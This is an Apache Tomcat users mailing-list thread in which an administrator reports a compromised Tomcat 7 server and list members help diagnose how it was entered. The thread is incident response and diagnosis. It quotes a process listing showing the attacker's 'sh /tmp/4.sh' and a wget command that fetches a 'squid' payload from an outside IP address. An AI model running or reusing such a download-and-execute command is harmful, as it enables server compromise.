-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Leonardo,
You need to post a thread dump as well. - -chris On 4/30/14, 11:35 AM, Leonardo Santagostini wrote: > Hello list, > > well my homework is done > > Here are the links: > > setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: > http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm > server.xml: http://pastebin.com/wfzE8bYU logging.properties: > http://pastebin.com/Qurk8sLU catalina.properties: > http://pastebin.com/jkfY1ZRQ tree + logsfiles: > http://pastebin.com/j3tip4ij > > Note that logsfiles, are not the logfiles itsef but only a ls -lah > (just for you to see the logsizes) > > A little more about the infraestructure i've mounted ill do some > ascii art. > > > internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk > (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7) > > > Apache(2) is serving static content so haproxy(1) at the first > level does http round robin balancing Apache(2) connects to > tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3) > Tomcat(5) are the main app server (the ones gets intruded) who > uses tomcat(7) (solr service) using haproxy(6) using L4 > connection. > > Versions: > > Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: > 1.6.0.41 > > [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version > java version "1.6.0_41" Java(TM) SE Runtime Environment (build > 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, > mixed mode) > > OS: CentOS 5.8 64 bit > > [root@arcbaappvrt05 tomcat]# uname -a Linux > arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb > 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux > [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS > release 5.8 (Final) [root@arcbaappvrt05 tomcat]# > > For now i havent see that the squid process whas launched so i > couldnt do a dump > > Letme know if you need more information. > > BTW, pastebin links will work for one week. > > Kind regards, yours > > > > > Saludos.- Leonardo Santagostini > > <http://ar.linkedin.com/in/santagostini> > > > > > > 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini > <lsantagost...@gmail.com>: > >> Ok, i will do the following: >> >> 1) thread dump of running tomcat instance 2) Pastebin the >> running tomcat config >> >> I think at mid day will have all the info. >> >> Thanks all for replying me and all the responses. >> >> Regards, Leonardo >> >> Saludos.- Leonardo Santagostini >> >> <http://ar.linkedin.com/in/santagostini> >> >> >> >> >> >> 2014-04-30 10:55 GMT-03:00 Christopher Schultz < >> ch...@christopherschultz.net>: >> >> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA256 >>> >>> Konstantin, >>> >>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: >>>> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini >>>> <lsantagost...@gmail.com>: >>>>> Hello Dan, >>>>> >>>>> Nop, the attacker is executing locally the following >>>>> >>>>> tomcat 8882 1 0 Apr27 ? 00:00:00 sh >>>>> /tmp/4.sh tomcat 8893 8882 0 Apr27 ? 00:00:00 >>>>> wget http://218.199.102.59/.xy/squid32 -O /tmp/squid >>>>> >>>>> And the launch squid who tries to connect via ssh to >>>>> varoius places. >>>>> >>>>> Right now its time to leave the office, but in a few hours >>>>> i will paste in pastebin access logs, config files, >>>>> wherever you tell me. >>>>> >>>>> This is my pstree >>>>> >>>>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree >>>>> init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] >>>> >>>> sh launched by tomcat's java? >>> >>> Yes: please verify that it's the JVM running Tomcat, and not >>> just any JVM process. >>> >>>> Take a thread dump: >>>> >>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F >>>> >>>> >>> >>> It shall show what is stacktrace in thread that launched external >>>> process. >>> >>> +1 >>> >>> The only things that ship with Tomcat that call Process.exec() >>> are the CGI servlet and SSI, both of which are disabled by >>> default. So, either you have an insecure CGI/SSI >>> configuration, your web application has a vulnerability, or you >>> have deployed something like the Manager application and >>> improperly-secured it. >>> >>> A classic example of such an intrusion might be that someone >>> got a foothold elsewhere into your network, and the Manager >>> web application is not properly secured with a password, etc. >>> >>> - -chris -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 >>> Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG >>> with Thunderbird - http://www.enigmail.net/ >>> >>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp >>> >>> >>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 >>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC >>> >>> >>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o >>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr >>> >>> >>> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS >>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj >>> >>> >>> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb >>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W >>> >>> >>> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 >>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 >>> >>> >>> lvJcfOhzHLwo07Pv+y3J >>> =EiX9 -----END PGP SIGNATURE----- >>> >>> --------------------------------------------------------------------- >>> >>> >>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org >>> For additional commands, e-mail: users-h...@tomcat.apache.org >>> >>> >> > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYR5XAAoJEBzwKT+lPKRYJ0UQAMTPdU2ugxOoFKdgq6twIyp8 S2DSQ5qI65fBrBYO09TxrEN+zoFRghvMLMCsrwe7rapW1gU4aO9KqYW+DCaK8O2Z eDai+s1VrDVCJrrtN/7mJzCBFfKa0aWmcbM2GCQByQrYNH14M1ty2OCYLj53cZgU XpdGApa/W0LwUFaSGTnRe8+z/J1kL6++AEhjDT2Hm778QNsmil19ShtQvtOIQiyd Yho5rlgPAEt5/FWzsX0y/Rsa8EkHdg/j3xdwyvhkPeW/4xS00XgGtFaRQHjWr3Wq AFfRZ75EXtS5pa3PwjRDQzEWva5IiCpRmVaDOBnDPG8bobrXngaVFVYSF9Jhfq72 ej8KgErYw0ov26snZhuq9FFl6/AK9dYrA6L7s1gKt1NOR5QMb821Lmltu/+RwciS wNuYVQoGxnz0UbJHTIziH8SpPECDCXslsLMEsHTXvGEUFZnvaRBXX7RWHSHweNkR UsNRM64+WBsQ/jDgP+J5Kbrea0Xsz/PiODDVJygFhv6fbypskNrgE/WXqmBSt6XN AKHzr+thNbYAkTbtWr0TSZvyQKcqYn/t1DW2iHYQuiWNtUTXT82AV2knnznrpIa9 Yiv2KcAS7Oa4h02uMxu1PvnQgQgNoePtVFfZu+Zcmr2xQ+LKNQB2jRV4z3rUTn+g TVrGfGXHuu+DuPCSFXUw =ZgyY -----END PGP SIGNATURE----- --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org